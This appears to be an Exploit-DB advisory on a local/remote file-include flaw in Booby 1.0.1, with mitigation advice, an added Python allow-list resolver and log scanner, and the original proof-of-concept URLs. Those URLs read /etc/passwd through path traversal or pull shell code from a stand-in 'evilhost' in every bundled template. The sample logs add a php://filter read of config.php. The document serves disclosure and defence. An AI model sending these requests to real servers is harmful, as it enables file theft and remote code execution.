Vendor: Booby
By: mailbox1333@gmail.com
CVSS: 8.8 (HIGH)
Type: Local File Include / Remote File Include
CWE: 98
Product Name: Booby
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:booby:booby:1.0.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Multiple Remote Vulnerabilities in Booby 1.0.1

Booby 1.0.1 is vulnerable to Local File Include (LFI) and Remote File Include (RFI). The script template.tpl.php, shipped in each of the bundled template directories (templates/barrel, barry, mylook, oerdec, penguin, sidebar, slashdot and text-only), passes the value of its 'renderer' GET parameter to an include without validating it. Because the script can be requested directly, an attacker who sends a crafted GET request can supply a directory-traversal path (for example ../../../../../../etc/passwd) to read any file the web server user can access, or, where the PHP configuration permits URL includes (allow_url_include, or allow_url_fopen on PHP releases before 5.2), a URL to an attacker-controlled file, which PHP then executes as code on the server. Note that the RFI proof of concept below uses the bare placeholder evilhost/shell.txt: include() only fetches over the network when the value carries a URL wrapper such as http://, and the same unvalidated include also exposes PHP stream wrappers such as php://filter for reading source files.

Mitigation:

User-controlled input must not be passed to include or require. The 'renderer' value should be treated as a key rather than a path: check it against a fixed list of known renderer names (or look it up in an array that maps names to file paths) and reject anything else, instead of trying to filter characters out of a free-form path. As defence in depth, resolve the final path and confirm it stays inside the template directory, set allow_url_include=Off (and allow_url_fopen=Off if remote reads are not needed), and block direct web access to template files that are only meant to be included. No vendor patch is listed for 1.0.1.
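The following is an added example, not code from Booby or from the advisory. It shows, in Python rather than the application's PHP, the two things a practitioner wants from the description above: an allow-list resolver that implements the mitigation (renderer treated as a key, result pinned under the template directory), and a scanner that picks the advisory's LFI/RFI request patterns out of web server access logs. The template root, the set of allowed renderer names, the combined-log format and the log lines themselves are assumptions constructed for the example; the real renderer names of Booby are not on the page.

```python
"""Allow-list hardening and log detection for the Booby 'renderer' LFI/RFI.

Added example, not part of Booby or the advisory.  Paths, renderer names
and log lines below are constructed assumptions for illustration.
"""
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote

# Assumed install location and assumed set of legitimate renderer names.
TEMPLATE_ROOT = "/var/www/booby/templates"
ALLOWED_RENDERERS = {"default", "print", "mobile"}

# Apache combined log format (assumed) and the vulnerable script path.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
TEMPLATE_RE = re.compile(r"/templates/([^/]+)/template\.tpl\.php$")
SCHEME_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.\-]*:")


def resolve_renderer(template: str, renderer: str) -> Optional[str]:
    """Hardened replacement for the unvalidated include in template.tpl.php.

    The renderer is a key, not a path: only an allow-listed name is accepted,
    and the file it maps to must still resolve inside the template's own
    directory.  Returns the path to include, or None to refuse the request.
    """
    if renderer not in ALLOWED_RENDERERS:
        return None
    base = os.path.join(TEMPLATE_ROOT, template)
    candidate = os.path.normpath(os.path.join(base, renderer + ".php"))
    # Belt and braces: even an allow-listed name must stay under base.
    if not candidate.startswith(base + os.sep):
        return None
    return candidate


def classify_renderer(value: str) -> str:
    """Classify a raw renderer value as 'traversal', 'wrapper' or 'ok'.

    The value is percent-decoded a second time on purpose: PHP decodes the
    query string once, but probes are often double-encoded and we would
    rather flag them than miss them.
    """
    v = unquote(value)
    # Any URL scheme (http://, ftp://, php://, data:) is a PHP stream wrapper;
    # with allow_url_include on, http:// means remote code inclusion.
    if SCHEME_RE.match(v) or v.startswith("//"):
        return "wrapper"
    # Parent-directory steps, absolute paths and NUL truncation are the
    # classic local-file-include shapes.
    if ".." in v or v.startswith("/") or "\x00" in v:
        return "traversal"
    return "ok"


def scan_access_log(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Return (ip, path, renderer_value, kind) for suspicious requests
    aimed at any templates/<name>/template.tpl.php."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not TEMPLATE_RE.search(path):
            continue  # only the vulnerable script is in scope here
        for value in parse_qs(query).get("renderer", []):
            kind = classify_renderer(value)
            if kind != "ok":
                findings.append((m.group("ip"), path, value, kind))
    return findings


# Constructed sample log lines; addresses and timestamps are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jun/2008:10:15:01 +0000] "GET /booby/templates/barrel/'
    'template.tpl.php?renderer=../../../../../../etc/passwd HTTP/1.1" 200 1423 "-" "curl/7.18"',
    '203.0.113.7 - - [02/Jun/2008:10:15:04 +0000] "GET /booby/templates/penguin/'
    'template.tpl.php?renderer=http%3A%2F%2Fevilhost%2Fshell.txt HTTP/1.1" 200 88 "-" "curl/7.18"',
    '203.0.113.7 - - [02/Jun/2008:10:15:09 +0000] "GET /booby/templates/sidebar/'
    'template.tpl.php?renderer=php://filter/convert.base64-encode/resource=../../config.php'
    ' HTTP/1.1" 200 3100 "-" "curl/7.18"',
    '198.51.100.2 - - [02/Jun/2008:10:16:30 +0000] "GET /booby/templates/mylook/'
    'template.tpl.php?renderer=default HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [02/Jun/2008:10:16:31 +0000] "GET /booby/index.php'
    '?renderer=../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, path, value, kind in scan_access_log(SAMPLE_LOG):
        print(f"{kind:9} {ip:14} {path} renderer={value!r}")
    print("resolve default ->", resolve_renderer("barrel", "default"))
    print("resolve traversal ->", resolve_renderer("barrel", "../../../../etc/passwd"))
```

The resolver deliberately rejects the advisory's RFI placeholder evilhost/shell.txt even though it contains no traversal or scheme: an allow-list of names needs no knowledge of attack shapes, which is why it is preferred over character filtering. The scanner is limited to the template.tpl.php path named in the advisory; widen TEMPLATE_RE if other scripts on the host take file-name parameters.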

Exploit-DB raw data:

#software name: Booby
#version: 1.0.1
#description: A Webbased Personal Information Manager (PIM) with support for bookmarks, calendar, contacts, notes, news and tasks.
#download: http://sourceforge.net/project/showfiles.php?group_id=87672&package_id=91447&release_id=326826
#bug: Multiple Remote Vulnerabilities
#contact: mailbox1333@gmail.com

Local File Include / Remote File Include in: template.tpl.php

Proof Of Concept LFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd

Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt



regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo /

# milw0rm.com [2008-06-02]